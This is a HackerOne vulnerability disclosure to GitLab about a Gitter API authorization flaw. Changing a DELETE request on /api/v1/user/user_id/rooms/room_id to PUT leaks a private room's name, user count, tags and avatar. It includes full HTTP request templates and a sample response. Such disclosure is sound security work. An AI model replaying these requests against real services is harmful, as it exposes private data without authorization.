Disclosure of information of a private chat room if you have room ID
HackerOne report #489976 by dhakalananda
on 2019-02-01, assigned to asaba
:
Summary:
Hi GitLab,
I have found a vulnerability that allows an attacker to view the confidential data of the private chat room.
Description:
You can get the information of the chat room by using the specific request [described in Steps to Reproduce]. All you need to perform this attack is room_id
. You get the following information of a private chat room:
- Name
- Number of users
- URL
- Profile Picture of the room
- Mentions Count
- Tags
Steps To Reproduce:
PUT /api/v1/user/user_id/rooms/room_id HTTP/1.1
Host: gitter.im
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://gitter.im
X-Requested-With: XMLHttpRequest
x-access-token: access_token
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/71.0.3578.98 Safari/537.36
DNT: 1
Referer: https://gitter.im/testingtheinternet/Public-Room
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: cookie
You can use the following request to exploit this vulnerability.
There is another way to get this request. Follow these steps:
- Create a Gitter account
- Make a conversation and go to all conversation
- Capture the request of hiding the room from all conversation.
Request looks like this:
DELETE /api/v1/user/user_id/rooms/room_id HTTP/1.1
Host: gitter.im
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://gitter.im
X-Requested-With: XMLHttpRequest
x-access-token: access_token
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
DNT: 1
Referer: https://gitter.im/testingtheinternet/Public-Room
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: cookie
All you have to do is change the DELETE request to PUT request. To get the information of a private room, change the room_id to the private room.
Response from the server:
{"id":"<roomId>","name":"<roomName>","topic":"","avatarUrl":"https://avatars-01.gitter.im/group/i/<roomId>","uri":"<roomUri>","oneToOne":false,"userCount":1,"unreadItems":0,"mentions":0,"lurk":false,"url":"/<roomUri>","githubType":"REPO_CHANNEL","security":"PRIVATE","noindex":false,"tags":["heck","hacked"],"roomMember":false,"groupId":"<groupId>","group":{"id":"<groupId>","name":"<groupName>","uri":"<groupUri>","homeUri":"<homeUri>","backedBy":{"type":null},"avatarUrl":"https://avatars-01.gitter.im/group/i/<groupId>"},"public":false,"v":2}
Impact
Unauthorized user could get the information of a private room. Sensitive information like tags, user count and profile picture of private room could get leaked if the attacker has the room_id.